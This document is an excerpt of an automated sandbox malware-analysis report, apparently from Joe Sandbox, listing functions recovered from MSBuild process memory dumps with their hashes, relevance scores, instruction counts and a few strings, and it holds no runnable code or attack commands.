Instruction ID: 7bd1b83cbc51262b26865fcc5c6422c266c9bcce5201f8cf14f74c661e8133d5
Opcode Fuzzy Hash: e3c5c3809ba2c6813b573ab4ee0d6400bc2507b56c7be859d5b393a35a3c87aa
Instruction Fuzzy Hash: 4651C030F002089FDB159FA9C854BAEBBF7FF88740F208429E509AB395DA748C059B91

Uniqueness

Uniqueness Score: -1.00%

Function 0120EB39 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1677651794.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1200000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd81e1b969a62ba7385b7f075b3e380f9e617dae26bc4e7d7f6e5426052b256
Instruction ID: a5cbb2d30c166a9d5a1ae74637dab72b1ffde7cbcc4374f49e98451a5b9bdf44
Opcode Fuzzy Hash: cbd81e1b969a62ba7385b7f075b3e380f9e617dae26bc4e7d7f6e5426052b256
Instruction Fuzzy Hash: 46413672D1075A9FCB04DF79D8046DEBFF5AF89310F15856AD904A7241EB349884CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0120EC20 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0120EC87

Memory Dump Source

Source File: 00000008.00000002.1677651794.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1200000_MSBuild.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: bc17ff736d94bd3b3873559c3c1f734500fbe5bf58999a2199c5daac610a6c95
Instruction ID: c69e2ce021b3eeb6951293b61616fecb4600db2fe02e6a04b1061858c40a1f51
Opcode Fuzzy Hash: bc17ff736d94bd3b3873559c3c1f734500fbe5bf58999a2199c5daac610a6c95
Instruction Fuzzy Hash: F31120B2C0026ADBCB10DF9AC544BDEFBF4AF48320F11812AD818B7241D378A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 065EDAC5 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

PH^q, xrefs: 065EDC21

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 93ed9130676a0bab16ea71196845fedb0b913695562758ec2fe10bec852d3825
Instruction ID: 7a36c663da2b8f78192866f9e2977d2bc399ac9c76d765aac7384ecc68acb319
Opcode Fuzzy Hash: 93ed9130676a0bab16ea71196845fedb0b913695562758ec2fe10bec852d3825
Instruction Fuzzy Hash: CB41CD70E0070A9FDF69DF65C85469EBBB6FF85300F204629E405EB280EB75A846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 065E21C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 065E2303

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: f77d0c23c1ba5cdbb0e09c329a62240ca174ac769912c72e38d27592bc2c4e34
Instruction ID: 08e3860a82ae3202e58670dd50aa885193775be0b0971a0762288cef95db5f96
Opcode Fuzzy Hash: f77d0c23c1ba5cdbb0e09c329a62240ca174ac769912c72e38d27592bc2c4e34
Instruction Fuzzy Hash: 8731C230B002059FDF59AB74C95466E7BE7BF89214F208429D406DB398EE35DE46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 065EC198 Relevance: .6, Instructions: 646COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b572fd859b34260986a9733390502dcca761eba54d6be4f20c6833b3c2a50432
Instruction ID: 6b9807a032618940531bc8dc443a20de51c1d97c497f90a90c50ef11f1d5f364
Opcode Fuzzy Hash: b572fd859b34260986a9733390502dcca761eba54d6be4f20c6833b3c2a50432
Instruction Fuzzy Hash: BA32A234B102098FDF58DB68D990BAEB7B2FB88314F10852AE415EB355DB35EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065E61F0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5759f38d5e199f06420da9a1b7d16a64c3967a35cd533b681f561e37a583545d
Instruction ID: a64ca4dc56f579660223f0de90e315c9a41c67e8f2fa0eccaabc5b380d57aa1d
Opcode Fuzzy Hash: 5759f38d5e199f06420da9a1b7d16a64c3967a35cd533b681f561e37a583545d
Instruction Fuzzy Hash: 7961C071F001214FCF549A7ECC8466FAAD7AFE4660B15443AD80EDB364DEA5DD028BC2

Uniqueness

Uniqueness Score: -1.00%

Function 065E42A8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8abe895028b70bb9d538488306e9e0d0f293b10bb98efb2a5a33abcea076c646
Instruction ID: 615f849f3f1709e9be056374e7efcc1dd0c478658f01d317e96c6d29fef55d2e
Opcode Fuzzy Hash: 8abe895028b70bb9d538488306e9e0d0f293b10bb98efb2a5a33abcea076c646
Instruction Fuzzy Hash: 77813B34B102099FDF58DBA9D5547AEB7F6AF89304F108429D50AEB394EB34EC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 065E45CC Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497ea7cc15338aa4545eb426f9d62ee599ab13b0811dd40597387b034821c126
Instruction ID: e6b1c63ed36754935c5656b1001c306263782ed28f1408f3ac89f7bcad890813
Opcode Fuzzy Hash: 497ea7cc15338aa4545eb426f9d62ee599ab13b0811dd40597387b034821c126
Instruction Fuzzy Hash: 04916D30E102198FDF64DF68C880B9DB7B1FF89300F208695D549AB295EB70AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 065E45E0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3a4aecb2c26f8bff391db2a33189239546fef48985128960ddd259b89a3009
Instruction ID: b9f2343203e9e7c58b2819f83907385f7b88f010e48ee84988976c8a3d817d27
Opcode Fuzzy Hash: 5c3a4aecb2c26f8bff391db2a33189239546fef48985128960ddd259b89a3009
Instruction Fuzzy Hash: F7913E30E106198BDF64DF68C880B9DB7B1FF89310F208695D549BB355EB70AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 065EEF18 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4862cf88e537b84af1eaa542b68fcab97285a50d66c5c9a45930c431f866bc7e
Instruction ID: aafe124a685cc5aa4de050a9925b3fe19db1120da9ebcd5f9e7adeff18c0c3e1
Opcode Fuzzy Hash: 4862cf88e537b84af1eaa542b68fcab97285a50d66c5c9a45930c431f866bc7e
Instruction Fuzzy Hash: B0713770E006099FCB58DFA9D980AADBBF6FF88304F148469E415AB355DB34E946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 065EEF28 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155b0dbc2e8c9c39ed003c79678e43d8527cdabea6493ed053abe1eb8baba2f4
Instruction ID: e39d6b9d92b2fcb290e3902c9bd824a38fa938d8cf65ff3b18f44b5c9c06b5dc
Opcode Fuzzy Hash: 155b0dbc2e8c9c39ed003c79678e43d8527cdabea6493ed053abe1eb8baba2f4
Instruction Fuzzy Hash: 9A711770A006099FDB58DFA9D980AAEBBF6FF88304F148469E405EB355DB30E946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 065EFC89 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f55ce2c685818be86f4fc37ddb094db516e471f12941489fc49a34fc87608c
Instruction ID: 93aff01282c0a60c28bf3ca1f8e0e71ff20a5dadd05679e1c1c8d0b9dbdd59a5
Opcode Fuzzy Hash: 52f55ce2c685818be86f4fc37ddb094db516e471f12941489fc49a34fc87608c
Instruction Fuzzy Hash: 0151E031E0060ADFCF58AF78E9486AEBBB2FF84315F108869E10AD7251DF359955CB81

Uniqueness

Uniqueness Score: -1.00%

Function 065EFA3A Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407191dada60a6529241981e3467a1041f4480e17b9f1f71a7873f5824d1c324
Instruction ID: d9d7257aac0ce987300393018bd2cadd408ad25384974633fb55b6786b53f292
Opcode Fuzzy Hash: 407191dada60a6529241981e3467a1041f4480e17b9f1f71a7873f5824d1c324
Instruction Fuzzy Hash: 8F51C730B106049FEF68566CD994B7F365EE789300F20482AE50AD77D9CE69CC4597A2

Uniqueness

Uniqueness Score: -1.00%

Function 065EFA48 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f121f2a05f0984866b331f2dfccefd61c0e2e699d269a923dfa4ae8027248d09
Instruction ID: abe09bdd347635d20d47e46535e9e2cadf5e3a7fa2ddc4f6842b338eb55dd194
Opcode Fuzzy Hash: f121f2a05f0984866b331f2dfccefd61c0e2e699d269a923dfa4ae8027248d09
Instruction Fuzzy Hash: 2451B630F10608DFEF68666CD99477F365EE789310F20482AE50ED7798CE69CC455B92

Uniqueness

Uniqueness Score: -1.00%

Function 065E5420 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9748631c7e340af21e61a0005920da20e41ff955771c6d0babb2adb021f2d2ae
Instruction ID: a6752f6e57c4d82245005fcf417c6ec0bc7a2ed59936fb4ccd1e715b5d515262
Opcode Fuzzy Hash: 9748631c7e340af21e61a0005920da20e41ff955771c6d0babb2adb021f2d2ae
Instruction Fuzzy Hash: 1C416D72E006058FDF74CEA9D880AAFFBB2FB84314F10492AD156D7654E331E9598F91

Uniqueness

Uniqueness Score: -1.00%

Function 065ED978 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ff9ab2d01045d9b65660b80e9b939f37a9abe6e88e83701dffe3474b0f2d08
Instruction ID: 37037338ad812cb8c2c50917f4de2bcef5462b47a0407b7f7de2cc8f4d06ca74
Opcode Fuzzy Hash: e1ff9ab2d01045d9b65660b80e9b939f37a9abe6e88e83701dffe3474b0f2d08
Instruction Fuzzy Hash: AA31A631E1070A9FCF25DF68D98469EBBB6FF85304F104529E405EB344DB70E9468B91

Uniqueness

Uniqueness Score: -1.00%

Function 065E2078 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124e141d0353d952ee30da3415b35fcda9a66dacdf304d50362fe465e3d6a9de
Instruction ID: 6f25a25b61ce634d3ea4e9f978905229d0550679e8114bf6a058277f3d15637f
Opcode Fuzzy Hash: 124e141d0353d952ee30da3415b35fcda9a66dacdf304d50362fe465e3d6a9de
Instruction Fuzzy Hash: 2A318F31E106059BCF59CFA4D89569EB7B6FF89300F108529E906EB354DB71AE46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 065E2088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344c3e383d354c6f3829795e1c83794c0302bf71905da678546db422374f9059
Instruction ID: 6adb68cf29fed36a66e6a9300b60c91cbcf5102a64a4b19a8d467c93752cb6d0
Opcode Fuzzy Hash: 344c3e383d354c6f3829795e1c83794c0302bf71905da678546db422374f9059
Instruction Fuzzy Hash: B2317C30E106059BCF5DCFA4D8A4A9EB7B6FF89300F108529E906E7754DB71AE46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 065E3AA9 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e44c4aaa442e432e6d93f784aa35cb51915697254a1ab24c9f748596b834f2
Instruction ID: 88a048a0dc09a33b6cf6784e1589fa261332c7ede0f05eb5a1990e656009b7dd
Opcode Fuzzy Hash: f2e44c4aaa442e432e6d93f784aa35cb51915697254a1ab24c9f748596b834f2
Instruction Fuzzy Hash: 07219A75F112099FDF14DFA9E840AAEBBF6FB48754F108025E909E7390EB30D9418B95

Uniqueness

Uniqueness Score: -1.00%

Function 065E3AB8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37f3b3abd25d9573b75d978e1d24ae0699f1de86089916135edfb238f810dcf
Instruction ID: a1c3c680be28da963a2f2f1d271a6c2e0850542f011c7eee31e51105dac92260
Opcode Fuzzy Hash: a37f3b3abd25d9573b75d978e1d24ae0699f1de86089916135edfb238f810dcf
Instruction Fuzzy Hash: A9216675F106199FDF44DFA9D880AAEBBF6FB48614F108029E906E7380EB30DD418B95

Uniqueness

Uniqueness Score: -1.00%

Function 065E3BC8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e15e8d3422f31b0dcc5ff80e4a849473ff0d5557cb0434925115dd61218ed42
Instruction ID: e71e6ab2a9f642f30220da01be8f5a378a63518c70ab6f883f02d01e67163464
Opcode Fuzzy Hash: 4e15e8d3422f31b0dcc5ff80e4a849473ff0d5557cb0434925115dd61218ed42
Instruction Fuzzy Hash: 2511A136B102289FDF58A679C8146AE73EBBFC8310B00453AC90AE7344DE25DC068B91

Uniqueness

Uniqueness Score: -1.00%

Function 065E420A Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958192a6c428c688902919b0a6fe270b10ab46c7ed6b1e6fe92804d318a5dcd5
Instruction ID: 5abdc124cdb36200c3d8749b1316e1afd9c75087baca7986f51d243904d5ede6
Opcode Fuzzy Hash: 958192a6c428c688902919b0a6fe270b10ab46c7ed6b1e6fe92804d318a5dcd5
Instruction Fuzzy Hash: CF01D430B045100FDB7586BDA85476FABDADBCA714F14C47AE60EC7385D925CC028791

Uniqueness

Uniqueness Score: -1.00%

Function 065EA321 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a6830d6436f5cc87f396c1af35cdadae8712cf0c87ab1a963234434bc55ef1
Instruction ID: 76d96e844e41f15d9155f5c58c5e4fd3cac8bb4bc26e120367d8225c5cc9e451
Opcode Fuzzy Hash: 90a6830d6436f5cc87f396c1af35cdadae8712cf0c87ab1a963234434bc55ef1
Instruction Fuzzy Hash: B601B130B002201FCB65A67CE9A0B5FB7DAEB8A718F004429E54AC7385DA25DD028791

Uniqueness

Uniqueness Score: -1.00%

Function 065E3BB7 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f09465a154549db8b4cc1f5f07f064919bf3ab10dd79a10b61cb9307610b5912
Instruction ID: e332fcce5f0281989af0c00345df7714e46b5916c0546baff9b60068f0144e1d
Opcode Fuzzy Hash: f09465a154549db8b4cc1f5f07f064919bf3ab10dd79a10b61cb9307610b5912
Instruction Fuzzy Hash: B701F73AF241286BDF58957ADC14AEF77AFEBC9250F00403AE50AD3240DE60DC0687E2

Uniqueness

Uniqueness Score: -1.00%

Function 065EF199 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc74932645da9bc6e77a641ef2aa6cfa390c8cb6aaedf0ee1e2c84aa1b5d9ee2
Instruction ID: b2d2e09da60c1588be1e98a5806fbd182779862603709012fcdd753634ec8dbd
Opcode Fuzzy Hash: fc74932645da9bc6e77a641ef2aa6cfa390c8cb6aaedf0ee1e2c84aa1b5d9ee2
Instruction Fuzzy Hash: 32012F71B005159FCB1ACABCFD61B2EA3E6EBCA214F14852AE10ACB345DF24DC024BC1

Uniqueness

Uniqueness Score: -1.00%

Function 065E3885 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b068d70eb04848c657a2527845d648b4a23d3a5cd6b685c82cc8ea8e4c81136
Instruction ID: 5b70a3da7ce1051529762fdbab155acc547e78a59de058ccf966e55fd30b968f
Opcode Fuzzy Hash: 6b068d70eb04848c657a2527845d648b4a23d3a5cd6b685c82cc8ea8e4c81136
Instruction Fuzzy Hash: E121C2B5D01259AFCB00DF9AD884ADEFFB4FB49324F10816AE918B7200D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 065E3888 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d77ae62325ef601cf01b8fc0abfa4ea19514c0b9e8723e91c7bf415053123822
Instruction ID: 3405806483e05b79878b324cb4282e546083c5a7123762696eeb42eca736fe1e
Opcode Fuzzy Hash: d77ae62325ef601cf01b8fc0abfa4ea19514c0b9e8723e91c7bf415053123822
Instruction Fuzzy Hash: 4E11CFB1D01259AFCB00DF9AD884ADEFBB4FB48324F10812AE918B7200D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 065E4218 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c46c9de6699f4c842933e42990f12ae56254b12021df6845d4988f919c60cd
Instruction ID: 3d788a463341c2c0454b87676091872f11692dacc923d00ffcb9266ba00f7e1d
Opcode Fuzzy Hash: 61c46c9de6699f4c842933e42990f12ae56254b12021df6845d4988f919c60cd
Instruction Fuzzy Hash: 47018C31F101101BDF6995ADA85472FA3DAEBCA714F20883AE60EC7389EA65DC024B95

Uniqueness

Uniqueness Score: -1.00%

Function 065EF1A8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ccda6ca5ae830e6f7b0c0acc11e907878c3b212b56bd5ab46ce7c8028829e71
Instruction ID: fc282632cb54d7ef1205e76d3b0362b6e930c341224d93f31b3cb3d4a6d684e6
Opcode Fuzzy Hash: 6ccda6ca5ae830e6f7b0c0acc11e907878c3b212b56bd5ab46ce7c8028829e71
Instruction Fuzzy Hash: 3701DC71B001155BCF6895ADF860B2EA2DAEBCA624F108439E10AC7344EE25DC020B85

Uniqueness

Uniqueness Score: -1.00%

Function 065EA330 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2cf76edf3c071211b188f4a43a49f0847dc622474cb57990a4a18eb10e70966
Instruction ID: 0005bca1e6d491764b2c05fee2457291a6aceb4e602e96b859def317c5e52a02
Opcode Fuzzy Hash: b2cf76edf3c071211b188f4a43a49f0847dc622474cb57990a4a18eb10e70966
Instruction Fuzzy Hash: 60013130B006155BDB68EA7CE99571FB3D6EB8E719F108429E50AC7384DE25EC428785

Uniqueness

Uniqueness Score: -1.00%

Function 065EC7E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71a7aa383d1f5714bba87d5a3f8d7dd17248cba1d7f2adbf72ee37f1b64994f
Instruction ID: faafd30686e33b62ed0e72d0c3a5d1d7e42fd830cf6bfcc78ccd50eb9245cd4f
Opcode Fuzzy Hash: e71a7aa383d1f5714bba87d5a3f8d7dd17248cba1d7f2adbf72ee37f1b64994f
Instruction Fuzzy Hash: 6701C831F202249BCF68AA69F94169EB779FB85754F10453AE911EB345DB31EC04CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 065E6471 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9b24f8f4d5bfc2b18a081bca8f568ae623cb49936876d3be659410cf93448c
Instruction ID: aec2ef0e17568b827625aa0ce5ff6f18f7fe650e6508dcc8d3dab82b0d0879da
Opcode Fuzzy Hash: bf9b24f8f4d5bfc2b18a081bca8f568ae623cb49936876d3be659410cf93448c
Instruction Fuzzy Hash: E8E02272E152097BDF60CE30CDA5B8B3B9DEB42254F1044A6F044C7102E133DA01CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 065E76A0 Relevance: 13.0, Strings: 10, Instructions: 477COMMON

Download Yara Rule

Strings

$^q, xrefs: 065E7C17
$^q, xrefs: 065E7B79
$^q, xrefs: 065E7B85
$^q, xrefs: 065E77AB
$^q, xrefs: 065E7C23
$^q, xrefs: 065E77DC
$^q, xrefs: 065E7C39
$^q, xrefs: 065E77E8
$^q, xrefs: 065E77B7
$^q, xrefs: 065E7C2D

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: daa36fd274f66c3552969c7d5f17a2d3c7f3c764cf7092a379f8395fd30a1969
Instruction ID: 5fce0211999c887c464623b5a27f64f9233a1da54eb51de3d054ab11705e25f7
Opcode Fuzzy Hash: daa36fd274f66c3552969c7d5f17a2d3c7f3c764cf7092a379f8395fd30a1969
Instruction Fuzzy Hash: D2122D30F102198FDF68DF65C954A6EB7B6BF89304F1089A9D40A9B355EB309D86CF81

Uniqueness

Uniqueness Score: -1.00%

Function 065EA950 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 065EAAA1
$^q, xrefs: 065EAB0E
$^q, xrefs: 065EAA46
$^q, xrefs: 065EAA52
$^q, xrefs: 065EAB02
$^q, xrefs: 065EAACC
$^q, xrefs: 065EAAD8
$^q, xrefs: 065EAAAD

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 85a9d0f2fd44534fff632a5a6bcf629534b209cbb82112c72b1627d5bcff474e
Instruction ID: 945d6f621312033e9b695a03080656efd4bef10831058042054a8f40e616d600
